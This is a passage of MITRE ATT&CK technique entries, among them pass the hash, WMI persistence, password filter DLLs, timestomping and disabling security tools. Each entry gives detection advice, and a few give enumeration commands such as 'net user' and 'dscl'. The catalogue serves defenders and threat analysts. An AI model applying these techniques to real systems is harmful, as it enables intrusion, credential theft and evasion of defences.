<p>Data Sources: Packet capture, Process use of network, Malware reverse engineering, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 769. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1079">https://attack.mitre.org/wiki/Technique/T1079</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840">http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html">https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf">https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_component_firmware_t1109"><a class="anchor" href="#_component_firmware_t1109"></a><a class="link" href="#_component_firmware_t1109">Component Firmware - T1109</a></h3>
<div class="paragraph">
<p>Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems</p>
</div>
<div class="paragraph">
<p>Permissions Required: SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Ability to update component device firmware from the host operating system.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 770. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1109">https://attack.mitre.org/wiki/Technique/T1109</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_share_discovery_t1135"><a class="anchor" href="#_network_share_discovery_t1135"></a><a class="link" href="#_network_share_discovery_t1135">Network Share Discovery - T1135</a></h3>
<div class="paragraph">
<p>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)</p>
</div>
<div class="paragraph">
<p>Net can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On Mac, locally mounted shares can be viewed with the &lt;code&gt;df -aH&lt;/code&gt; command.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, Process command-line parameters, Network protocol analysis, Process use of network</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 771. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1135">https://attack.mitre.org/wiki/Technique/T1135</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Shared%20resource">https://en.wikipedia.org/wiki/Shared%20resource</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/library/cc770880.aspx">https://technet.microsoft.com/library/cc770880.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_management_instrumentation_event_subscription_t1084"><a class="anchor" href="#_windows_management_instrumentation_event_subscription_t1084"></a><a class="link" href="#_windows_management_instrumentation_event_subscription_t1084">Windows Management Instrumentation Event Subscription - T1084</a></h3>
<div class="paragraph">
<p>Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts. (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer&#8217;s uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: WMI Objects</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 772. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1084">https://attack.mitre.org/wiki/Technique/T1084</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/blog/wmi-persistence">https://www.secureworks.com/blog/wmi-persistence</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf">https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_disabling_security_tools_t1089"><a class="anchor" href="#_disabling_security_tools_t1089"></a><a class="link" href="#_disabling_security_tools_t1089">Disabling Security Tools - T1089</a></h3>
<div class="paragraph">
<p>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Anti-virus, File monitoring, Services, Windows Registry, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, File monitoring, Host intrusion prevention systems, Signature-based detection, Log analysis</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 773. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1089">https://attack.mitre.org/wiki/Technique/T1089</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_peripheral_device_discovery_t1120"><a class="anchor" href="#_peripheral_device_discovery_t1120"></a><a class="link" href="#_peripheral_device_discovery_t1120">Peripheral Device Discovery - T1120</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 774. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1120">https://attack.mitre.org/wiki/Technique/T1120</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_compressed_t1002"><a class="anchor" href="#_data_compressed_t1002"></a><a class="link" href="#_data_compressed_t1002">Data Compressed - T1002</a></h3>
<div class="paragraph">
<p>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</p>
</div>
<div class="paragraph">
<p>Detection: Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used.</p>
</div>
<div class="paragraph">
<p>If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 775. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1002">https://attack.mitre.org/wiki/Technique/T1002</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/List%20of%20file%20signatures">https://en.wikipedia.org/wiki/List%20of%20file%20signatures</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_account_discovery_t1087"><a class="anchor" href="#_account_discovery_t1087"></a><a class="link" href="#_account_discovery_t1087">Account Discovery - T1087</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of local system or domain accounts.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Example commands that can acquire this information are &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net group &lt;groupname&gt;&lt;/code&gt;, and &lt;code&gt;net localgroup &lt;groupname&gt;&lt;/code&gt; using the Net utility or through use of dsquery. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, System Owner/User Discovery may apply.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On Mac, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands. In mac specifically, &lt;code&gt;dscl . list /Groups&lt;/code&gt; and &lt;code&gt;dscacheutil -q group&lt;/code&gt; can also be used to enumerate groups and users.</p>
</div>
<div class="paragraph">
<p>===Linux===</p>
</div>
<div class="paragraph">
<p>On Linux, local users can be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file which is world readable. In mac, this same file is only used in single-user mode in addition to the &lt;code&gt;/etc/master.passwd&lt;/code&gt; file.</p>
</div>
<div class="paragraph">
<p>Also, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands. In mac specifically, &lt;code&gt;dscl . list /Groups&lt;/code&gt; and &lt;code&gt;dscacheutil -q group&lt;/code&gt; can also be used to enumerate groups and users.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 776. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1087">https://attack.mitre.org/wiki/Technique/T1087</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pass_the_hash_t1075"><a class="anchor" href="#_pass_the_hash_t1075"></a><a class="link" href="#_pass_the_hash_t1075">Pass the Hash - T1075</a></h3>
<div class="paragraph">
<p>Pass the hash (PtH) is a method of authenticating as a user without having access to the user&#8217;s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.</p>
</div>
<div class="paragraph">
<p>Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)</p>
</div>
<div class="paragraph">
<p>Detection: Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<div class="paragraph">
<p>System Requirements: Requires Microsoft Windows as target system</p>
</div>
<div class="paragraph">
<p>Contributors: Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 777. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1075">https://attack.mitre.org/wiki/Technique/T1075</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nsa.gov/ia/%20files/app/spotting%20the%20adversary%20with%20windows%20event%20log%20monitoring.pdf">http://www.nsa.gov/ia/%20files/app/spotting%20the%20adversary%20with%20windows%20event%20log%20monitoring.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_source_t1153"><a class="anchor" href="#_source_t1153"></a><a class="link" href="#_source_t1153">Source - T1153</a></h3>
<div class="paragraph">
<p>The &lt;code&gt;source&lt;/code&gt; command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways &lt;code&gt;source /path/to/filename [arguments]&lt;/code&gt; or &lt;code&gt;. /path/to/filename [arguments]&lt;/code&gt;. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell&#8217;s environment.</p>
</div>
<div class="paragraph">
<p>Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, File monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 778. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1153">https://attack.mitre.org/wiki/Technique/T1153</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_timestomp_t1099"><a class="anchor" href="#_timestomp_t1099"></a><a class="link" href="#_timestomp_t1099">Timestomp - T1099</a></h3>
<div class="paragraph">
<p>Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name Masquerading to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)</p>
</div>
<div class="paragraph">
<p>Detection: Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Host forensic analysis</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 779. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1099">https://attack.mitre.org/wiki/Technique/T1099</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html">http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_brute_force_t1110"><a class="anchor" href="#_brute_force_t1110"></a><a class="link" href="#_brute_force_t1110">Brute Force - T1110</a></h3>
<div class="paragraph">
<p>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.</p>
</div>
<div class="paragraph">
<p>Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)</p>
</div>
<div class="paragraph">
<p>Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization&#8217;s login failure policies. (Citation: Cylance Cleaver)</p>
</div>
<div class="paragraph">
<p>A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)</p>
</div>
<div class="paragraph">
<p>Detection: It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.</p>
</div>
<div class="paragraph">
<p>Monitor authentication logs for system and application login failures of Valid Accounts. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</p>
</div>
<div class="paragraph">
<p>Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: John Strand</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 780. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1110">https://attack.mitre.org/wiki/Technique/T1110</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Password%20cracking">https://en.wikipedia.org/wiki/Password%20cracking</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf">https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.blackhillsinfosec.com/?p=4645">http://www.blackhillsinfosec.com/?p=4645</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_modify_registry_t1112"><a class="anchor" href="#_modify_registry_t1112"></a><a class="link" href="#_modify_registry_t1112">Modify Registry - T1112</a></h3>
<div class="paragraph">
<p>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.</p>
</div>
<div class="paragraph">
<p>Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).</p>
</div>
<div class="paragraph">
<p>The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often Valid Accounts are required, along with access to the remote system&#8217;s Windows Admin Shares for RPC communication.</p>
</div>
<div class="paragraph">
<p>Detection: Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell, which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Host forensic analysis</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Bartosz Jerzman, Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 781. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1112">https://attack.mitre.org/wiki/Technique/T1112</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc732643.aspx">https://technet.microsoft.com/en-us/library/cc732643.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc754820.aspx">https://technet.microsoft.com/en-us/library/cc754820.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_password_filter_dll_t1174"><a class="anchor" href="#_password_filter_dll_t1174"></a><a class="link" href="#_password_filter_dll_t1174">Password Filter DLL - T1174</a></h3>
<div class="paragraph">
<p>Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.</p>
</div>
<div class="paragraph">
<p>Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.</p>
</div>
<div class="paragraph">
<p>Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for change notifications to and from unfamiliar password filters.</p>
</div>
<div class="paragraph">
<p>Newly installed password filters will not take effect until after a system reboot.</p>
</div>
<div class="paragraph">
<p>Password filters will show up as an autorun and loaded DLL in lsass.exe. (Citation: Clymb3r Function Hook Passwords Sept 2013)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: DLL monitoring, Windows Registry, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Contributors: Vincent Le Toux</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 782. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1174">https://attack.mitre.org/wiki/Technique/T1174</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html">http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/">https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_space_after_filename_t1151"><a class="anchor" href="#_space_after_filename_t1151"></a><a class="link" href="#_space_after_filename_t1151">Space after Filename - T1151</a></h3>
<div class="paragraph">
